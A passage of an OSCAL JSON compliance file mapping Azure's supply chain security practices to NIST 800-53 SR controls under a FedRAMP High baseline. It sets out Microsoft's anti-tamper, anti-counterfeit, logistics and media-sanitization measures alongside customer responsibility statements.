The efforts described below are designed to ensure the enforcement of supply chain controls, including tamper protection for information system components supporting Azure cloud environments: Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. 
Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. 
In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third-Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). 
In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"6bdb24cd-0e29-4e3e-b25f-6f1cdbfe876f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-017"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for employing anti-tamper technologies, tools, and techniques throughout the system development life cycle.","provided-uuid":"160dd627-ce9e-48fd-adc6-c938dcc9c214"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4103049d-0cf4-4ec8-955b-330fc7ecbbce","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-10","statements":[{"uuid":"06c64f5f-836a-49a5-9025-93be977a267d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-10_smt","by-components":[{"uuid":"9ea2a9f6-48b6-490e-9d2c-8699103b2fa3","export":{"provided":[{"uuid":"f37b4a04-f40a-46e8-8d86-5e3a9ece763c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-018"}],"description":"\"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. 
The efforts described below are designed to ensure the enforcement of supply chain controls, including inspection of the system components that make up Azure cloud environments at random intervals to detect and respond to physical and logical tampering: Procurement: During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of purchase orders to our suppliers, ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations: Customer Operations performs routine business reviews with our suppliers, representing the needs and concerns of all Azure business groups. This team also supports Azure business groups on standards definition and service capability. A key function of this team is to protect against threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and processes. Deployment Quality: At system integration, or upon delivery of services to our Azure datacenters for deployment, Deployment Quality works to ensure that final delivery of the system to the Azure business group is on time and free of defects. Working in conjunction with Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional supply chain activities. Supplier Relationship Management (SRM): As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause analysis and corrective action within the suppliers' supply chains. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base using a balanced scorecard approach. 
Spares: Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during troubleshooting, helping to ensure site uptime for our business. To ensure the security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record in secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are delivered in a timely manner. Business Continuity: Microsoft manages a comprehensive Continuity of Supply program with redundancies across systems integrators and component suppliers wherever possible. A dedicated team drives continuous analysis of multi-source versus single-source components and end-of-life transitions across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and to cover last-time purchases. Supplier financial health is assessed routinely, with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. Processes exist for each service to provide its offering in each boundary, and additional processes are in place for designated high-integrity devices and services. Logistics: Microsoft continues to increase assurance in the complex global cloud supply chain by implementing a new global control tower capability, the next generation of supply chain visibility. 
The new capability delivers proactive intelligence on potential disruptions, including weather, traffic, and global events, allowing Microsoft to notify customers as disruptions occur so that deliveries can be adjusted and completed successfully. In addition, Microsoft is placing sensors on high-value shipments with GPS capability, supported by light and temperature detection, at fifteen (15) minute tracking intervals. Validation: Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware: Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support: Capabilities including Threat Intelligence, the Digital Crimes Unit, the Cyber Defense Operations Center, and Service Security Teams, together with the Azure Red Team, conduct coordinated overt and covert activities to validate and strengthen the global Azure and specific sovereign infrastructures. In addition, Third-Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership: The Microsoft Supply Chain Security program has maintained industry-leading low loss levels across its supply chains for the past five (5) years. Microsoft is Tier 3 certified with the Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, with Australia pending. Global Leadership and Partnerships: Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). 
In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"32f2d42a-9266-4544-aae8-101e0d863566","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-018"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources against supply chain threats as part of a comprehensive, defense-in-breadth information security strategy.","provided-uuid":"f37b4a04-f40a-46e8-8d86-5e3a9ece763c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d4b27c51-a102-4436-b0e3-8ba920c2b433","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-11","statements":[{"uuid":"cee2d22d-c279-4c4d-8a93-615f30d99b82","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-11_smt.a","by-components":[{"uuid":"544ab420-c424-4900-9fe1-a63350a70d25","export":{"provided":[{"uuid":"bc3d75c5-b1bc-43ae-9f28-33131dbc8e02","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-019"}],"description":"Azure has processes in place to prevent and detect counterfeit components from entering the information system. As preventive measures, Azure must follow the Microsoft corporate procurement process. 
Azure sources hardware and software only through original equipment manufacturer (OEM) suppliers and their certified distribution partners that have been approved through the procurement process. The agreements with suppliers of hardware and software contain security provisions to ensure the security of the supply chain and protection against threats such as counterfeit components. Additionally, for its infrastructure services Azure maintains authoritative lists of approved software through its Definitive Software Library (DSL) as well as IPAK images, ensuring that software and updates come only from approved sources. As a detective measure, Azure implements vulnerability scanning for the Azure environment by actively scanning all server operating systems, network devices, web applications, and databases in the Azure inventory with authenticated scans. Risk Protective Services (RPS), of which Anti-Piracy Services (APS) is a part, manages Microsoft's Supply Chain Security program for its traditional manufacturing and digital supply chains, including, but not limited to: device manufacturing (Xbox, Surface, accessories); physical and digital software manufacturing; distribution of products; secure print (COA, Xbox Live, Skype, and Office cards); digital distribution; OEM; Azure; and more. The program also covers the technologies these products utilize, telemetry data on key usage, and investigations of abuse and counterfeiting. All of these suppliers are contractually required to adhere to Microsoft policies. APS partners with other teams within Microsoft to ensure suppliers are secure both physically and digitally: IRSM (IT), DCU (Digital Crimes Unit), CCR (Cyber Crimes Unit), Global Security (Microsoft assets and people), Azure supply chain, and WDG Security (leak prevention, new product introduction, and investigations). APS crosses all lines of business and channels at Microsoft. 
The Supply Chain Security (SCS) program manages Microsoft's Tier 3 certification with the Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program. SCS manages supplier security requirements, best practices, and compliance inspections throughout Microsoft's physical and digital supply chains. The requirements are reviewed annually against industry best practices and updated. Risk analysis of the Microsoft global supply chain is performed annually. Microsoft continues to increase assurance in the complex global cloud supply chain by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions, including weather, traffic, and global events, allowing Microsoft to notify customers as disruptions occur so that deliveries can be adjusted and completed successfully. In addition, Microsoft is placing sensors on high-value shipments with GPS capability, supported by light and temperature detection, at fifteen (15) minute tracking intervals. Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the OEM prior to shipment and again at the Microsoft datacenter. Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Microsoft capabilities including Threat Intelligence, the Digital Crimes Unit, the Cyber Defense Operations Center, and Service Security Teams, together with the Azure Red Team, utilize coordinated overt and covert activities to validate and strengthen the global Azure and specific sovereign infrastructures. 
In addition, Third-Party Assessment Organization (3PAO) penetration tests are part of the overall certifications."}],"responsibilities":[{"uuid":"f88d5e00-f6d8-482c-98dc-4f9a1072cda0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-019"}],"description":"The customer is responsible for developing and implementing anti-counterfeit policy and procedures in order to detect and prevent counterfeit components.","provided-uuid":"bc3d75c5-b1bc-43ae-9f28-33131dbc8e02"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0777b7d4-4c79-4010-9148-e1c379fbf852","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-11_smt.b","by-components":[{"uuid":"ddb38912-1439-4483-9b15-ea4dab0f4026","export":{"provided":[{"uuid":"f0fcfa72-51d9-44dc-855e-73c8b247d8a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-020"}],"description":"Reports of counterfeit information system components follow the incident handling procedures. 
In the event a counterfeit incident impacts Azure assets or services requiring customer notification, the Security Response Team coordinates with the service team to notify the customer and USCYBERCOM."}],"responsibilities":[{"uuid":"9b45f455-2c4b-4e68-8ee0-f2e998f2fd5d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-020"}],"description":"The customer is responsible for reporting counterfeit information system components to the source of the counterfeit components, customer-defined external reporting organizations, and/or customer-defined personnel/roles.","provided-uuid":"f0fcfa72-51d9-44dc-855e-73c8b247d8a0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a8715dc5-b4bc-4e27-a5ce-04be9fd9bdd8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-11.1","statements":[{"uuid":"9c3774be-1f27-457e-ade7-4c4878cc6f1a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-11.1_smt","by-components":[{"uuid":"0de5629b-c17c-4608-83ba-047768de5bbf","export":{"provided":[{"uuid":"c92d699c-e45d-4cd9-aeff-6d4faca9fd8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-021"}],"description":"The Microsoft Supply Chain Security program maintains industry-leading quality programs whereby Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray 
Market and Counterfeit Abatement (AGMA). In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization. Personnel supporting the program are trained under the curriculum programs identified in the AT control family. All members of software development teams receive appropriate training to stay informed about security basics and recent trends in security. Individuals who develop software programs are required to complete at least one security training course, in person or online, each year. Security training helps ensure software is created with security in mind and helps development teams stay current on security issues. Project team members are strongly encouraged to seek additional security and privacy education appropriate to their needs or products. Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding: * Secure configuration, installation, and operation of the information system; * Effective use and maintenance of security features/functions; and * Known vulnerabilities regarding configuration and use of administrative (i.e., elevated) functions. This documentation is stored in each service team's SharePoint site or STRIKE Central and is made available to service team members. 
Review of relevant documentation is part of initial and ongoing training activities held at least annually."}],"responsibilities":[{"uuid":"2b00a93f-4b43-4d5f-8023-17b837538ca9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-021"}],"description":"The customer is responsible for training personnel to detect counterfeit information system components supporting customer-deployed resources.","provided-uuid":"c92d699c-e45d-4cd9-aeff-6d4faca9fd8e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b5aa1f95-eab5-4b19-bbfd-a81e44c00687","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-11.2","statements":[{"uuid":"05699af7-9a76-4f05-9e61-07993c5a053d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-11.2_smt","by-components":[{"uuid":"e561970b-01a8-48ea-9ad3-9e25605b563f","export":{"provided":[{"uuid":"20fb8d9b-1be9-42d1-ad62-31acc310786c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-022"}],"description":"Information system components that make up Azure cloud environments consist of physical digital media hardware and logical software. Both digital media and logical software components of Azure cloud environments are housed in Azure datacenters deployed in United States geographic locations. 
Datacenter Management (DCM) and Critical Environment (CE) teams implement configuration control for digital media hardware that is awaiting service or repair, or that has been serviced or repaired, at Azure datacenters. Digital media hardware changes are tested and documented for investigation purposes. For logical software, Azure service teams apply configuration control to information system components that are awaiting service or repair, or that have been serviced or repaired. Changes are conducted in a separate development/test environment, are subject to testing with defined pass rates and to peer review that enforces separation of duties, and are implemented into production via Safe Deployment Practices (SDP). Changes are documented for investigation purposes."}],"responsibilities":[{"uuid":"13ae2765-3e04-4ddd-82a5-af7c24b9584f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-022"}],"description":"The customer is responsible for maintaining configuration control over customer-controlled information system components awaiting service or repair and serviced or repaired.","provided-uuid":"20fb8d9b-1be9-42d1-ad62-31acc310786c"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fb541918-4843-49b2-9e72-841b40b9e0a0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-12","statements":[{"uuid":"db4a779c-168f-442b-a8d2-b4e4c45c2c1a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-023"},{"name":"control-origination","value":"system-specific"}],"statement-id":"sr-12_smt","by-components":[{"uuid":"73284ffd-fd06-4fe5-a8d8-9f6fffca0259","export":{"provided":[{"uuid":"f5bcf681-507a-4efc-b570-4cca2588b8fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-023"}],"description":"In Azure datacenters, Azure digital media is sanitized using approved tools and in compliance with customer requirements, including NIST Special Publication 800-88 Revision 1, prior to being reused. Non-digital media is not used by Azure in the datacenter environment. All data-bearing devices (DBDs) used by Azure are shredded on site by an approved ITAD vendor, or by the customer per customer standards. No DBDs leave the Azure datacenters. If hardware is considered volatile and deemed returnable to the supplier, it is shipped out via the standard RMA process as outlined in the Sparing and RMA Strategy. 
For assets requiring destruction, Azure utilizes onsite asset destruction services."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]}]},"back-matter":{"resources":[{"uuid":"21f7e477-4aea-432c-95e0-65b678ecdc89","title":"FedRAMP High Baseline","rlinks":[{"href":"https://raw.githubusercontent.com/OSCAL-Foundation/fedramp-resources/refs/heads/main/baselines/rev5/json/FedRAMP_rev5_HIGH-baseline_profile.json","media-type":"application/oscal+json"}]}]}}}